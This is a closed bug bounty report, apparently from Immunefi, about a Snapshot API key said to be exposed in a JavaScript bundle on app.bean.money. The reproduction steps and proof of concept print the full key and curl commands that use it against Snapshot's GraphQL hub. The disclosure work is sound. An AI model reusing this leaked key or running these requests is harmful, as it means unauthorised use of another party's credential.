📄

Report #30684

Report Date
May 4, 2024
Status
Closed
Payout

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation.

Report Info

Report ID

#30684

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

  • UNAUTHORIZED USE OF APIKEY

Description

Bug Bounty Report

Report Title: API Key Leakage on app.bean.money

Summary:

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation. JS FILE = https://app.bean.money/assets/index-CuZKWR4O.js

Severity: High

Reproduction Steps:

  1. go to https://app.bean.money/assets/index-CuZKWR4O.js
  2. search for ,VITE_SNAPSHOT_API_KEY:"83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59"
  3. i have created some curl request for this
  • *1.

curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'

  • H 'content-type: application/json'
  • -data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
  • -compressed
  • *2.

curl 'https://hub.snapshot.org/graphql?'

  • H 'content-type: application/json'
  • H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'
  • -data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
  • -compressed

these are the curl request

Impact: The exposure of the API key poses a significant security risk, allowing attackers to potentially access sensitive company data and resources through the Snapshot API.

Affected Endpoint:

Recommendation:

  1. Immediately revoke the leaked API key and generate a new one to prevent further unauthorized access.
  2. Conduct a thorough security audit to identify any additional vulnerabilities or exposures.
  3. Implement stricter access controls and monitoring mechanisms to prevent similar incidents in the future.

Proof of concept

curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'

  • H 'content-type: application/json'
  • -data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
  • -compressed
  • *2.

curl 'https://hub.snapshot.org/graphql?'

  • H 'content-type: application/json'
  • H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'
  • -data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
  • -compressed

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close since being out of scope for Beanstalk bug bounty program.
  • claimed impact by the whitehat is not in scope for the bug bounty program
  • claimed asset by the whitehat is in scope for the bug bounty program
  • PoC has been submitted to the project
  • claimed severity is in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.